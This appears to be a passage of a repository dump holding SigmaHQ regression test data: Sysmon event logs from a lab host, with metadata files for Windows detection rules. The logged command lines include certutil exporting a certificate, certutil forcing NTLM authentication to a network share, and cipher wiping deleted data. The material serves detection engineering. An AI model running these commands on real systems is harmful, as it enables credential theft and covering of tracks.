    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:04:22.017117Z\"\n        }\n      },\n      \"EventRecordID\": 11570013,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:04:22.010\",\n      \"ProcessGuid\": \"5AA13A44-0316-68FD-8535-000000004002\",\n      \"ProcessId\": 3980,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\certutil.exe\",\n      \"FileVersion\": \"10.0.20348.4163 (WinBuild.160101.0800)\",\n      \"Description\": \"CertUtil.exe\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CertUtil.exe\",\n      \"CommandLine\": \"certutil  -encode file.bat file_.base64\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode/info.yml",
    "content": "id: 70e4269e-9d3c-4bfb-ad84-0b63124ad0a2\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a\n      title: File Encoded To Base64 Via Certutil.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:04:22.017117Z\"\n        }\n      },\n      \"EventRecordID\": 11570013,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:04:22.010\",\n      \"ProcessGuid\": \"5AA13A44-0316-68FD-8535-000000004002\",\n      \"ProcessId\": 3980,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\certutil.exe\",\n      \"FileVersion\": \"10.0.20348.4163 (WinBuild.160101.0800)\",\n      \"Description\": \"CertUtil.exe\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CertUtil.exe\",\n      \"CommandLine\": \"certutil  -encode file.bat file_.base64\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/info.yml",
    "content": "id: 7033fe69-1fd7-4da2-b525-222c1b087107\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: ea0cdc3e-2239-4f26-a947-4e8f8224e464\n      title: Suspicious File Encoded To Base64 Via Certutil.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:05:11.334152Z\"\n        }\n      },\n      \"EventRecordID\": 11585346,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:05:11.327\",\n      \"ProcessGuid\": \"5AA13A44-0347-68FD-8B35-000000004002\",\n      \"ProcessId\": 6780,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\certutil.exe\",\n      \"FileVersion\": \"10.0.20348.4163 (WinBuild.160101.0800)\",\n      \"Description\": \"CertUtil.exe\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CertUtil.exe\",\n      \"CommandLine\": \"certutil  -encode C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\Microsoft\\\\Network\\\\sr011.xml C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\Microsoft\\\\Network\\\\conv.xml\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": 
\"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location/info.yml",
    "content": "id: bfbc8981-818e-4de5-b7a4-1bb3d4a08792\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 82a6714f-4899-4f16-9c1e-9a333544d4c3\n      title: File In Suspicious Location Encoded To Base64 Via Certutil.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:23:42.049726Z\"\n        }\n      },\n      \"EventRecordID\": 11818106,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:23:42.043\",\n      \"ProcessGuid\": \"5AA13A44-079E-68FD-0236-000000004002\",\n      \"ProcessId\": 2456,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\certutil.exe\",\n      \"FileVersion\": \"10.0.20348.4163 (WinBuild.160101.0800)\",\n      \"Description\": \"CertUtil.exe\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CertUtil.exe\",\n      \"CommandLine\": \"certutil  -p secret_password -exportPFX root 1c6119aff8414c91487c4e02d18dd73D c:\\\\cert.pfx\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      
\"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_export_pfx/info.yml",
    "content": "id: 387ea4f5-f74d-4b14-a1a7-db8c97fb56c2\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5\n      title: Certificate Exported Via Certutil.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:26:24.815458Z\"\n        }\n      },\n      \"EventRecordID\": 11867155,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:26:24.808\",\n      \"ProcessGuid\": \"5AA13A44-0840-68FD-1336-000000004002\",\n      \"ProcessId\": 4424,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\certutil.exe\",\n      \"FileVersion\": \"10.0.20348.4163 (WinBuild.160101.0800)\",\n      \"Description\": \"CertUtil.exe\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CertUtil.exe\",\n      \"CommandLine\": \"certutil  -syncwithWU \\\\\\\\10.0.1.14\\\\my-share\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/info.yml",
    "content": "id: 32397458-1d93-45ee-a3c8-9efebb81d9d1\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 6c6d9280-e6d0-4b9d-80ac-254701b64916\n      title: Potential NTLM Coercion Via Certutil.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:27:26.975358Z\"\n        }\n      },\n      \"EventRecordID\": 11886324,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:27:26.974\",\n      \"ProcessGuid\": \"5AA13A44-087E-68FD-1A36-000000004002\",\n      \"ProcessId\": 6788,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\chcp.com\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Change CodePage Utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CHCP.COM\",\n      \"CommandLine\": \"chcp\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=0489A9D0B4342F9C87C03510E0073898864946A5,MD5=0714C0100E008D00EC82E7B549595F69,SHA256=A807B535F7176642FC87911D185C10B00981388CDA68F5B8E2FF4C73FF514352,IMPHASH=75FA51C548B19C4AD5051FAB7D57EB56\",\n      \"ParentProcessGuid\": \"5AA13A44-087E-68FD-1936-000000004002\",\n      \"ParentProcessId\": 8248,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"cmd.exe  /c chcp\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup/info.yml",
    "content": "id: 30e3935a-84b4-45ad-85e2-c209c57dbfa7\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 7090adee-82e2-4269-bd59-80691e7c6338\n      title: Console CodePage Lookup Via CHCP\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:28:28.958645Z\"\n        }\n      },\n      \"EventRecordID\": 11905446,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:28:28.957\",\n      \"ProcessGuid\": \"5AA13A44-08BC-68FD-2336-000000004002\",\n      \"ProcessId\": 8208,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\chcp.com\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Change CodePage Utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CHCP.COM\",\n      \"CommandLine\": \"chcp  936\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=0489A9D0B4342F9C87C03510E0073898864946A5,MD5=0714C0100E008D00EC82E7B549595F69,SHA256=A807B535F7176642FC87911D185C10B00981388CDA68F5B8E2FF4C73FF514352,IMPHASH=75FA51C548B19C4AD5051FAB7D57EB56\",\n      \"ParentProcessGuid\": \"5AA13A44-08B2-68FD-2136-000000004002\",\n      \"ParentProcessId\": 3204,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch/info.yml",
    "content": "id: a67c0d0c-3b40-4fef-a39d-5bd528255d90\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: c7942406-33dd-4377-a564-0f62db0593a3\n      title: Suspicious CodePage Switch Via CHCP\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:32:06.432272Z\"\n        }\n      },\n      \"EventRecordID\": 11973062,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:32:06.421\",\n      \"ProcessGuid\": \"5AA13A44-0996-68FD-3A36-000000004002\",\n      \"ProcessId\": 2876,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\cipher.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"File Encryption Utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CIPHER.EXE\",\n      \"CommandLine\": \"cipher.exe  /w:C:\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=5747F6E48C899AEE54E4153AC8A8B61E741F45E2,MD5=3D7D3EEDD055EFF0C7995491466A7EB7,SHA256=6E04AD8A79A7D794438E197606AB78B079929D941FE99DD5159702694F7ACE77,IMPHASH=E83B4C457AFD5EEA31874B00E8A3A956\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/info.yml",
    "content": "id: 18b75b44-f2a5-497f-934c-9d0941f57f0f\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 4b046706-5789-4673-b111-66f25fe99534\n      title: Deleted Data Overwritten Via Cipher.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:33:00.990279Z\"\n        }\n      },\n      \"EventRecordID\": 11989935,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 